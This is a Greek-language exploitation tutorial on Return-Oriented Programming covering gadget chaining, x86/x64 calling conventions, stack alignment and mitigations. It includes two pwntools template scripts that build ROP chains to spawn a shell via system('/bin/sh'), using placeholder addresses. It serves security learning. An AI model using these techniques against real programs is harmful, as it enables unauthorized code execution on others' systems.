ROP - Return Oriented Programing

Βασικές Πληροφορίες

Return-Oriented Programming (ROP) είναι μια προηγμένη τεχνική εκμετάλλευσης που χρησιμοποιείται για να παρακάμψει μέτρα ασφαλείας όπως το No-Execute (NX) ή το Data Execution Prevention (DEP). Αντί να εισάγει και να εκτελεί shellcode, ένας επιτιθέμενος εκμεταλλεύεται κομμάτια κώδικα που είναι ήδη παρόντα στο δυαδικό αρχείο ή σε φορτωμένες βιβλιοθήκες, γνωστά ως "gadgets". Κάθε gadget συνήθως τελειώνει με μια εντολή ret και εκτελεί μια μικρή λειτουργία, όπως η μετακίνηση δεδομένων μεταξύ καταχωρητών ή η εκτέλεση αριθμητικών πράξεων. Συνδέοντας αυτά τα gadgets, ένας επιτιθέμενος μπορεί να κατασκευάσει ένα payload για να εκτελέσει αυθαίρετες λειτουργίες, παρακάμπτοντας αποτελεσματικά τις προστασίες NX/DEP.

Πώς Λειτουργεί το ROP

1. Hijacking Ροής Ελέγχου: Πρώτα, ένας επιτιθέμενος πρέπει να hijack τη ροή ελέγχου ενός προγράμματος, συνήθως εκμεταλλευόμενος μια υπερχείλιση buffer για να αντικαταστήσει μια αποθηκευμένη διεύθυνση επιστροφής στο stack.

2. Αλυσίδωση Gadgets: Ο επιτιθέμενος στη συνέχεια επιλέγει προσεκτικά και αλυσόδεσε gadgets για να εκτελέσει τις επιθυμητές ενέργειες. Αυτό μπορεί να περιλαμβάνει τη ρύθμιση παραμέτρων για μια κλήση συνάρτησης, την κλήση της συνάρτησης (π.χ., system("/bin/sh")), και την διαχείριση οποιασδήποτε απαραίτητης καθαριότητας ή πρόσθετων λειτουργιών.

3. Εκτέλεση Payload: Όταν η ευάλωτη συνάρτηση επιστρέφει, αντί να επιστρέψει σε μια νόμιμη τοποθεσία, αρχίζει να εκτελεί την αλυσίδα των gadgets.

Εργαλεία

Συνήθως, τα gadgets μπορούν να βρεθούν χρησιμοποιώντας ROPgadget, ropper ή απευθείας από pwntools (ROP).

ROP Chain σε Παράδειγμα x86

x86 (32-bit) Συμβάσεις Κλήσης

• cdecl: Ο καλών καθαρίζει το stack. Οι παράμετροι της συνάρτησης τοποθετούνται στο stack σε αντίστροφη σειρά (δεξιά προς τα αριστερά). Οι παράμετροι τοποθετούνται στο stack από δεξιά προς τα αριστερά.

• stdcall: Παρόμοιο με το cdecl, αλλά ο καλούμενος είναι υπεύθυνος για τον καθαρισμό του stack.

Εύρεση Gadgets

Πρώτα, ας υποθέσουμε ότι έχουμε εντοπίσει τα απαραίτητα gadgets μέσα στο δυαδικό αρχείο ή στις φορτωμένες βιβλιοθήκες. Τα gadgets που μας ενδιαφέρουν είναι:

• pop eax; ret: Αυτό το gadget αφαιρεί την κορυφαία τιμή του stack στον καταχωρητή EAX και στη συνέχεια επιστρέφει, επιτρέποντάς μας να ελέγξουμε το EAX.

• pop ebx; ret: Παρόμοιο με το παραπάνω, αλλά για τον καταχωρητή EBX, επιτρέποντας τον έλεγχο του EBX.

• mov [ebx], eax; ret: Μεταφέρει την τιμή στο EAX στη διεύθυνση μνήμης που υποδεικνύεται από το EBX και στη συνέχεια επιστρέφει. Αυτό συχνά ονομάζεται write-what-where gadget.

• Επιπλέον, έχουμε τη διεύθυνση της συνάρτησης system() διαθέσιμη.

ROP Chain

Χρησιμοποιώντας pwntools, προετοιμάζουμε το stack για την εκτέλεση της ROP αλυσίδας ως εξής, στοχεύοντας να εκτελέσουμε system('/bin/sh'), σημειώστε πώς η αλυσίδα ξεκινά με:

1. Μια εντολή ret για σκοπούς ευθυγράμμισης (προαιρετική)

2. Διεύθυνση της συνάρτησης system (υποθέτοντας ότι το ASLR είναι απενεργοποιημένο και γνωστή η libc, περισσότερες πληροφορίες στο Ret2lib)

3. Θέση για τη διεύθυνση επιστροφής από το system()

4. Διεύθυνση της συμβολοσειράς "/bin/sh" (παράμετρος για τη συνάρτηση system)

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadc0de

# A gadget to control the return address, typically found through analysis
ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control the return address

# Construct the ROP chain
rop_chain = [
ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
system_addr,   # Address of system(). Execution will continue here after the ret gadget
0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
]

# Flatten the rop_chain for use
rop_chain = b''.join(p32(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

ROP Chain in x64 Example

x64 (64-bit) Calling conventions

• Χρησιμοποιεί τη System V AMD64 ABI κλήση σε Unix-like συστήματα, όπου τα πρώτα έξι ακέραια ή δείκτες επιχειρήματα περνιούνται στους καταχωρητές RDI, RSI, RDX, RCX, R8, και R9. Πρόσθετα επιχειρήματα περνιούνται στη στοίβα. Η τιμή επιστροφής τοποθετείται στο RAX.

• Η κλήση Windows x64 χρησιμοποιεί RCX, RDX, R8, και R9 για τα πρώτα τέσσερα ακέραια ή δείκτες επιχειρήματα, με πρόσθετα επιχειρήματα να περνιούνται στη στοίβα. Η τιμή επιστροφής τοποθετείται στο RAX.

• Καταχωρητές: Οι 64-bit καταχωρητές περιλαμβάνουν RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, και R8 έως R15.

Finding Gadgets

Για τον σκοπό μας, ας επικεντρωθούμε σε gadgets που θα μας επιτρέψουν να ρυθμίσουμε τον RDI καταχωρητή (για να περάσουμε τη "/bin/sh" συμβολοσειρά ως επιχείρημα στη system()) και στη συνέχεια να καλέσουμε τη system() συνάρτηση. Θα υποθέσουμε ότι έχουμε εντοπίσει τα εξής gadgets:

• pop rdi; ret: Αφαιρεί την κορυφαία τιμή της στοίβας στον RDI και στη συνέχεια επιστρέφει. Απαραίτητο για να ρυθμίσουμε το επιχείρημά μας για τη system().

• ret: Μια απλή επιστροφή, χρήσιμη για την ευθυγράμμιση της στοίβας σε ορισμένα σενάρια.

Και γνωρίζουμε τη διεύθυνση της system() συνάρτησης.

ROP Chain

Παρακάτω είναι ένα παράδειγμα που χρησιμοποιεί pwntools για να ρυθμίσει και να εκτελέσει μια ROP αλυσίδα με στόχο την εκτέλεση system('/bin/sh') σε x64:

from pwn import *

# Assuming we have the binary's ELF and its process
binary = context.binary = ELF('your_binary_here')
p = process(binary.path)

# Find the address of the string "/bin/sh" in the binary
bin_sh_addr = next(binary.search(b'/bin/sh\x00'))

# Address of system() function (hypothetical value)
system_addr = 0xdeadbeefdeadbeef

# Gadgets (hypothetical values)
pop_rdi_gadget = 0xcafebabecafebabe  # pop rdi; ret
ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary

# Construct the ROP chain
rop_chain = [
ret_gadget,        # Alignment gadget, if needed
pop_rdi_gadget,    # pop rdi; ret
bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
system_addr        # Address of system(). Execution will continue here.
]

# Flatten the rop_chain for use
rop_chain = b''.join(p64(addr) for addr in rop_chain)

# Send ROP chain
## offset is the number of bytes required to reach the return address on the stack
payload = fit({offset: rop_chain})
p.sendline(payload)
p.interactive()

In this example:

• Χρησιμοποιούμε το pop rdi; ret gadget για να ορίσουμε το RDI στη διεύθυνση του "/bin/sh".

• Κάνουμε άμεση μετάβαση στη system() μετά την ρύθμιση του RDI, με τη διεύθυνση της system() στην αλυσίδα.

• Το ret_gadget χρησιμοποιείται για ευθυγράμμιση αν το περιβάλλον στόχος το απαιτεί, το οποίο είναι πιο συνηθισμένο σε x64 για να διασφαλιστεί η σωστή ευθυγράμμιση της στοίβας πριν από την κλήση συναρτήσεων.

Stack Alignment

Η x86-64 ABI διασφαλίζει ότι η στοίβα είναι ευθυγραμμισμένη στα 16 byte όταν εκτελείται μια εντολή κλήσης. LIBC, για να βελτιστοποιήσει την απόδοση, χρησιμοποιεί εντολές SSE (όπως movaps) που απαιτούν αυτή την ευθυγράμμιση. Αν η στοίβα δεν είναι σωστά ευθυγραμμισμένη (σημαίνει ότι το RSP δεν είναι πολλαπλάσιο του 16), οι κλήσεις σε συναρτήσεις όπως η system θα αποτύχουν σε μια ROP αλυσίδα. Για να το διορθώσετε, απλά προσθέστε ένα ret gadget πριν από την κλήση της system στην ROP αλυσίδα σας.

x86 vs x64 κύρια διαφορά

ROP chain in ARM64 Example

ARM64 Βασικές έννοιες & Συμβάσεις κλήσης

Δείτε την παρακάτω σελίδα για αυτές τις πληροφορίες:

Προστασίες κατά του ROP

• ASLR & PIE: Αυτές οι προστασίες καθιστούν πιο δύσκολη τη χρήση του ROP καθώς οι διευθύνσεις των gadgets αλλάζουν μεταξύ των εκτελέσεων.

• Stack Canaries: Σε περίπτωση BOF, είναι απαραίτητο να παρακαμφθούν οι αποθηκευμένοι canary της στοίβας για να επαναγραφούν οι δείκτες επιστροφής για να εκμεταλλευτούν μια ROP αλυσίδα.

• Έλλειψη Gadgets: Αν δεν υπάρχουν αρκετά gadgets, δεν θα είναι δυνατή η δημιουργία μιας ROP αλυσίδας.

ROP βασισμένες τεχνικές

Σημειώστε ότι το ROP είναι απλώς μια τεχνική για την εκτέλεση αυθαίρετου κώδικα. Βασισμένο στο ROP, αναπτύχθηκαν πολλές τεχνικές Ret2XXX:

• Ret2lib: Χρησιμοποιεί ROP για να καλέσει αυθαίρετες συναρτήσεις από μια φορτωμένη βιβλιοθήκη με αυθαίρετες παραμέτρους (συνήθως κάτι σαν system('/bin/sh').

• Ret2Syscall: Χρησιμοποιεί ROP για να προετοιμάσει μια κλήση σε μια syscall, π.χ. execve, και να εκτελέσει αυθαίρετες εντολές.

• EBP2Ret & EBP Chaining: Το πρώτο θα εκμεταλλευτεί το EBP αντί του EIP για να ελέγξει τη ροή και το δεύτερο είναι παρόμοιο με το Ret2lib αλλά σε αυτή την περίπτωση η ροή ελέγχεται κυρίως με διευθύνσεις EBP (αν και είναι επίσης απαραίτητο να ελέγχεται το EIP).

Άλλα παραδείγματα & Αναφορές

• https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions

• https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html

• 64 bit, Pie και nx ενεργοποιημένα, χωρίς canary, επαναγραφή του RIP με μια διεύθυνση vsyscall με τον μοναδικό σκοπό να επιστρέψει στην επόμενη διεύθυνση στη στοίβα που θα είναι μια μερική επαναγραφή της διεύθυνσης για να αποκτήσει το μέρος της συνάρτησης που διαρρέει τη σημαία.

• https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/

• arm64, χωρίς ASLR, ROP gadget για να κάνει τη στοίβα εκτελέσιμη και να μεταβεί σε shellcode στη στοίβα.